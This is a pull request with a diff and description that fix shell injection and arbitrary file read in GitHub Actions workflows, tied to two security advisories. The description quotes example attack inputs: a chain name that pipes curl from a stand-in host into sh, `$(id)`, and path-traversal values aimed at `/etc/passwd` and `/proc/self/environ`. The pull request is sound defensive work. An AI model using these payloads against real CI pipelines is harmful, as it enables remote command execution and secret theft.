### PR TITLE
security: fix chain-input script injection + arbitrary file read (GHSA-h9v2 / GHSA-cqvj)

### DIFF
--- a/.github/workflows/aeon.yml
+++ b/.github/workflows/aeon.yml
@@ -346,6 +346,7 @@ jobs:
           SKILL_NAME: ${{ steps.skill.outputs.name }}
           INPUT_MODEL: ${{ inputs.model }}
           INPUT_HARNESS: ${{ inputs.harness }}
+          INPUT_CHAIN_CTX: ${{ inputs.chain_context_file }}
         run: |
           TODAY=$(date -u +%Y-%m-%d)
           export SKILL_NAME
@@ -472,8 +473,21 @@ jobs:
           SKILL_NAME="${{ steps.skill.outputs.name }}"
           VAR="$SKILL_VAR"
 
-          # Build prompt — inject chain context if running as part of a chain
-          CHAIN_CTX="${{ inputs.chain_context_file }}"
+          # Build prompt — inject chain context if running as part of a chain.
+          # env-bound (not ${{ }}-interpolated) + path-contained: the context file
+          # must be a chain-runner artifact under output/.chains/, never an
+          # arbitrary path — otherwise cat would read any file on the runner (e.g.
+          # /proc/self/environ, secrets) into the prompt/logs. (GHSA-cqvj-gr78-24mc)
+          CHAIN_CTX="$INPUT_CHAIN_CTX"
+          if [ -n "$CHAIN_CTX" ]; then
+            case "$CHAIN_CTX" in
+              *..*) echo "::error::chain_context_file must not contain '..'"; exit 1 ;;
+            esac
+            case "$CHAIN_CTX" in
+              output/.chains/*) : ;;
+              *) echo "::error::chain_context_file must be under output/.chains/"; exit 1 ;;
+            esac
+          fi
           if [ -n "$CHAIN_CTX" ] && [ -f "$CHAIN_CTX" ]; then
             CONTEXT=$(cat "$CHAIN_CTX")
             PROMPT="Today is $TODAY.

--- a/.github/workflows/chain-runner.yml
+++ b/.github/workflows/chain-runner.yml
@@ -39,9 +39,18 @@ jobs:
       - name: Run chain
         env:
           GH_TOKEN: ${{ secrets.GH_GLOBAL || secrets.GITHUB_TOKEN }}
+          _INPUT_CHAIN: ${{ inputs.chain }}
         run: |
           set -euo pipefail
-          CHAIN="${{ inputs.chain }}"
+          # env-bound (not ${{ }}-interpolated) + allowlisted: a chain name is an
+          # aeon.yml chains: key, so it must match ^[a-zA-Z0-9_-]+$. Interpolating
+          # it into the shell source let a crafted value break out and run
+          # arbitrary commands on the runner. (GHSA-h9v2-7m42-33m3)
+          CHAIN="$_INPUT_CHAIN"
+          if ! printf '%s' "$CHAIN" | grep -qE '^[a-zA-Z0-9_-]+$'; then
+            echo "::error::Invalid chain name: must match ^[a-zA-Z0-9_-]+$"
+            exit 1
+          fi
           NOW_ISO=$(date -u +%FT%TZ)
           echo "Running chain: $CHAIN"
 
@@ -287,8 +296,14 @@ jobs:
         env:
           GH_TOKEN: ${{ secrets.GH_GLOBAL || secrets.GITHUB_TOKEN }}
           STATE_BACKEND: ${{ vars.STATE_BACKEND }}
+          _INPUT_CHAIN: ${{ inputs.chain }}
         run: |
-          CHAIN="${{ inputs.chain }}"
+          # env-bound + allowlisted, same as the Run chain step. (GHSA-h9v2-7m42-33m3)
+          CHAIN="$_INPUT_CHAIN"
+          if ! printf '%s' "$CHAIN" | grep -qE '^[a-zA-Z0-9_-]+$'; then
+            echo "::error::Invalid chain name: must match ^[a-zA-Z0-9_-]+$"
+            exit 1
+          fi
           NOW_ISO=$(date -u +%FT%TZ)
           STATUS="${CHAIN_STATUS:-failed}"
           STATE_FILE="memory/cron-state.json"


### PR DESCRIPTION
## Summary

Fixes two **High**-severity advisories reported by @usephylax — both the same bug class as the already-published `messages.yml` fix (GHSA-252c-qvvq-j2j9): untrusted `workflow_dispatch`/`workflow_call` inputs interpolated via `${{ }}` **directly into shell `run:` blocks**, so the value becomes shell source rather than data.

I read every cited line and traced reachability before fixing. Both are valid; the reporter's severity and prescribed fix are correct.

### GHSA-h9v2-7m42-33m3 — script injection via `inputs.chain`
`.github/workflows/chain-runner.yml:44` and `:291` — `CHAIN="${{ inputs.chain }}"`. A crafted chain name (`x"; curl evil|sh; "`) breaks out and runs arbitrary commands on the runner with `contents: write` + `actions: write` + the `GH_GLOBAL` token.
**Fix:** env-bind (`_INPUT_CHAIN`) + allowlist `^[a-zA-Z0-9_-]+$` at both sinks — the exact pattern already used for `inputs.skill` in `aeon.yml`.

### GHSA-cqvj-gr78-24mc — arbitrary file read via `inputs.chain_context_file`
`.github/workflows/aeon.yml:476` — `cat "${{ inputs.chain_context_file }}"` with no path containment reads **any** file on the runner (`/proc/self/environ`, `.mcp.json`, …) into the Claude prompt and logs/committed output → **secret disclosure**. It's also the same shell-injection class.
**Fix:** env-bind (`INPUT_CHAIN_CTX`) + restrict to the `output/.chains/` prefix, reject `..` and absolute paths.

## Why legit usage is unaffected
- Chain names are `aeon.yml` `chains:` keys → already match `^[a-zA-Z0-9_-]+$`.
- `chain-runner.yml` only ever passes `output/.chains/.chain-context-<skill>.md` (built at `chain-runner.yml:128`).

## Verification
- Both workflows still parse (`yaml.safe_load`).
- Audited: no `${{ inputs.chain* }}` interpolation remains in any `run:` block — only safe `env:` bindings and the non-shell `run-name`/`concurrency.group` contexts.
- Unit-tested the guards:
  - allowlist ✅ accepts `morning-brief`, `crypto_daily`; ✅ rejects `x"; curl evil|sh; "`, `$(id)`, empty.
  - path containment ✅ accepts `output/.chains/.chain-context-crypto.md`; ✅ rejects `/etc/passwd`, `/proc/self/environ`, `output/.chains/../../etc/passwd`, `.mcp.json`.

## Note
`steps.skill.outputs.name` (interpolated nearby) is **not** a third sink — it's validated against `^[a-zA-Z0-9_-]+$` at its source (`aeon.yml:108`) before being emitted.

Closes GHSA-h9v2-7m42-33m3
Closes GHSA-cqvj-gr78-24mc
